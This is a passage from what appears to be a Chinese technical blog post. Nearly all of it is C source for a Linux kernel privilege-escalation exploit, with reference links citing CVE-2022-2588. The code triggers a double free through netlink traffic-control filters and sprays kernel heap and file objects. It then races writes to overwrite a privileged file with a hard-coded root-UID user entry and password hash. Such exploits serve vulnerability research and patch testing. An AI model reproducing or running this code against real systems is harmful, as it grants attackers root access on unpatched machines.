struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
sendmsg(fd, &msgh, 0);
free(data);
free(start);
return 1;
}

void *delete_tc_basic(int sockfd, u_int32_t handle)
{
char *start = malloc(0x4000);
memset(start, 0, 0x4000);
struct nlmsghdr *msg = (struct nlmsghdr *)start;

// new filter
msg = msg + msg->nlmsg_len;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
msg->nlmsg_type = RTM_DELTFILTER;
struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

// prio, protocol
u_int32_t prio = 1;
u_int32_t protocol = 1;
t->tcm_info = TC_H_MAKE(prio << 16, protocol);
t->tcm_ifindex = 1;
t->tcm_family = AF_UNSPEC;
t->tcm_handle = handle;
// t->tcm_parent = TC_H_ROOT;

addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
addattr_nest_end(msg, tail);

// packing
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
struct msghdr msgh = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};

sendmsg(sockfd, &msgh, 0);
memset(start, 0, 0x4000);
iov.iov_len = 0x4000;
iov.iov_base = start;
recvmsg(sockfd, &msgh, 0);

if (msgh.msg_namelen != sizeof(nladdr))
{
printf("size of sender address is wrong\n");
}

return start;
}

void *slow_write()
{
printf("start slow write\n");
clock_t start, end;
int fd = open("./uaf", 1);

if (fd < 0)
{
perror("error open uaf file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
for (offset = 0; offset < 0x80000 / 20; offset++)
{
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0)
{
printf("allocate failed at 0x%x\n", offset);
}
}

assert(offset > 0);

void *mem = (void *)(addr);
memcpy(mem, "hhhhh", 5);

struct iovec iov[20];
for (int i = 0; i < 20; i++)
{
iov[i].iov_base = mem;
iov[i].iov_len = offset * 0x1000;
}

run_write = 1;
start = clock();
// 2GB max
if (writev(fd, iov, 20) < 0)
{
perror("slow write");
}
end = clock();
double spent = (double)(end - start) / CLOCKS_PER_SEC;
printf("write done, spent %f s\n", spent);
run_write = 0;
}

void *write_cmd()
{
// user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash
char data[1024] =
"user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash";
// struct iovec iov = {.iov_base = data, .iov_len = strlen(data)};
struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};

while (!run_write)
{
}
run_spray = 1;
if (writev(overlap_a, &iov, 1) < 0)
{
printf("failed to write\n");
}
printf("should be after the slow write\n");
}

void pre_exploit()
{
adjust_rlimit();
use_temporary_dir();
setup_namespace();
}

void exploit()
{
char buf[2 * PAGE_SIZE] = {};
char msg[0x10] = {};
char *spray;
int cc;
struct rlimit old_lim, lim, new_lim;

// Get old limits
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \t"
" hard limit= %ld \n",
old_lim.rlim_cur, old_lim.rlim_max);
pin_on_cpu(0);
printf("starting exploit, num of cores: %d\n", cpu_cores);

sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sockfd != -1);
add_qdisc(sockfd);

// wait for parent
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// allocate the vulnerable object
add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);

// ask parent to keep spraying
if (write(pipe_parent[1], "OK", 2) != 2)
{
err(1, "write to child");
}
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}

// free the object, to free the slab
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);

// wait for the vulnerable object being freed
usleep(500 * 1000);
printf("freed the filter object\n");
// sync
if (write(pipe_parent[1], "OK", 2) != 2)
{
err(1, "write to child");
}
if (read(pipe_child[0], msg, 2) != 2)
{
err(1, "read from parent");
}

usleep(1000 * 1000);

for (int i = 0; i < spray_num_1; i++)
{
pin_on_cpu(i % cpu_cores);
fds[i] = open("./data2", 1);
assert(fds[i] > 0);
}

// double free route4, which will free the file
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);
usleep(1000 * 100);

// should not sleep too long, otherwise file might be claimed by others
printf("double free done\n");
printf("spraying files\n");

// the following is to figure out which file is freed
for (int i = 0; i < spray_num_2; i++)
{
pin_on_cpu(i % cpu_cores);
fd_2[i] = open("./uaf", 1);
assert(fd_2[i] > 0);
for (int j = 0; j < spray_num_1; j++)
{
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) ==
0)
{
printf("found overlap, id : %d, %d\n", i, j);
overlap_a = fds[j];
overlap_b = fd_2[i];

pthread_t pid, pid2;
pthread_create(&pid, NULL, slow_write, NULL);
pthread_create(&pid2, NULL, write_cmd, NULL);

while (!run_spray)
{
}

close(overlap_a);
close(overlap_b);
printf("closed overlap\n");

usleep(1000 * 100);

int spray_num = 4096;
write(pipe_file_spray[0][1], &spray_num, sizeof(int));
if (read(pipe_file_spray[1][0], &msg, 2) != 2)
{
err(1, "read from file spray");
}
overlapped = true;
}
}
if (overlapped)
break;
}

sleep(3);
while (run_write)
{
sleep(1);
}

if (!overlapped)
{
printf("no overlap found :(...\n");
write(pipe_main[1], "\xff", 1);
}
else
{
int xx = open(target, 0);
char buf[0x100] = {};
// check if user in the passwd
read(xx, buf, 0x30);
if (!strncmp(buf, "user", 4))
{
write(pipe_main[1], "\x00", 1);
}
else
{
printf("not successful : %s\n", buf);
write(pipe_main[1], "\xff", 1);
}
}
while (1)
{
sleep(1000);
}
}

void post_exploit() {}

// this poc assume we have a heap address leaked
int run_exp()
{
if (pipe(pipe_parent) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_child) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_defrag) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_file_spray[0]) == -1)
{
err(1, "fail to create pipes\n");
}

if (pipe(pipe_file_spray[1]) == -1)
{
err(1, "fail to create pipes\n");
}

cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

if (fork() == 0)
{
// thread for spraying file we want to overwrite
adjust_rlimit();
int spray_num = 0;
if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))
{
err(1, "read file spray");
}

printf("got cmd, start spraying %s\n", target);
spray_num = 4096;
if (fork() == 0)
{
for (int i = 0; i < spray_num; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
while (1)
{
sleep(10000);
}
}

for (int i = 0; i < spray_num; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("spray done\n");
write(pipe_file_spray[1][1], "OK", 2);
while (1)
{
sleep(10000);
}
exit(0);
}

if (fork() == 0)
{
pin_on_cpu(0);
pre_exploit();
exploit();
post_exploit();
}
else
{
sleep(2);
if (fork() == 0)
{
// do the defragmentation to exhaust all file slabs
// for cross cache
adjust_rlimit();
for (int i = 0; i < 10000; i++)
{
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("defrag done\n");
if (write(pipe_defrag[1], "OK", 2) != 2)
{
err(1, "failed write defrag");
}
while (1)
{
sleep(1000);
}
}
else
{
// memory spray thread
setup_namespace();
pin_on_cpu(0);
int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sprayfd != -1);
add_qdisc(sprayfd);

char msg[0x10] = {};
char payload[256] = {};
memset(payload + 0x10, 'A', 256 - 0x10);

if (read(pipe_defrag[0], msg, 2) != 2)
{
err(1, "failed read defrag");
}

// if the exploit keeps failing, please tune the middle and end
int middle = 38;
int end = middle + 40;

// preparing for cross cache
for (int i = 0; i < middle; i++)
{
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
}

add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
// allocate route4
if (read(pipe_parent[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// add_tc_basic(sprayfd, middle+2, payload, 129, 32);

// prepare another part for cross cache
for (int i = middle + 2; i < end; i++)
{
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
}
printf("spray 256 done\n");

for (int i = 1; i < end - 24; i++)
{
// prevent double free of 192
// and being reclaimed by others
if (i == middle || i == middle + 1)
continue;
delete_tc_basic(sprayfd, i + 1);
}
if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
// free route4 here
if (read(pipe_parent[0], msg, 2) != 2)
{
err(1, "read from parent");
}
// if (cpu_cores == 1) sleep(1);
delete_tc_basic(sprayfd, middle + 2);
delete_tc_basic(sprayfd, middle + 3);
delete_tc_basic(sprayfd, 1);
for (int i = middle + 2; i < end; i++)
{
delete_tc_basic(sprayfd, i + 1);
}

printf("256 freed done\n");

if (write(pipe_child[1], "OK", 2) != 2)
{
err(1, "write to parent\n");
}
while (1)
{
sleep(1000);
}
}
}
}

int main(int argc, char **argv)
{
global = (char *)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_SHARED | MAP_ANON, -1, 0);
memset(global, 0, 0x2000);

self_path = global;
snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
printf("self path %s\n", self_path);

int fd = open(target, 0);
content = (char *)(global + 0x100);
strcpy(content, overwrite);
read(fd, content + strlen(overwrite), 0x1000);
close(fd);

assert(pipe(pipe_main) == 0);

printf("prepare done\n");

if (fork() == 0)
{
run_exp();
while (1)
{
sleep(10000);
}
}

char data;
read(pipe_main[0], &data, 1);
if (data == 0)
{
printf("succeed\n");
}
else
{
printf("failed\n");
}
}

参考链接:

https://github.com/Markakd/CVE-2022-2588

https://paper.seebug.org/2019/

https://elixir.bootlin.com/linux/v5.14/source

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量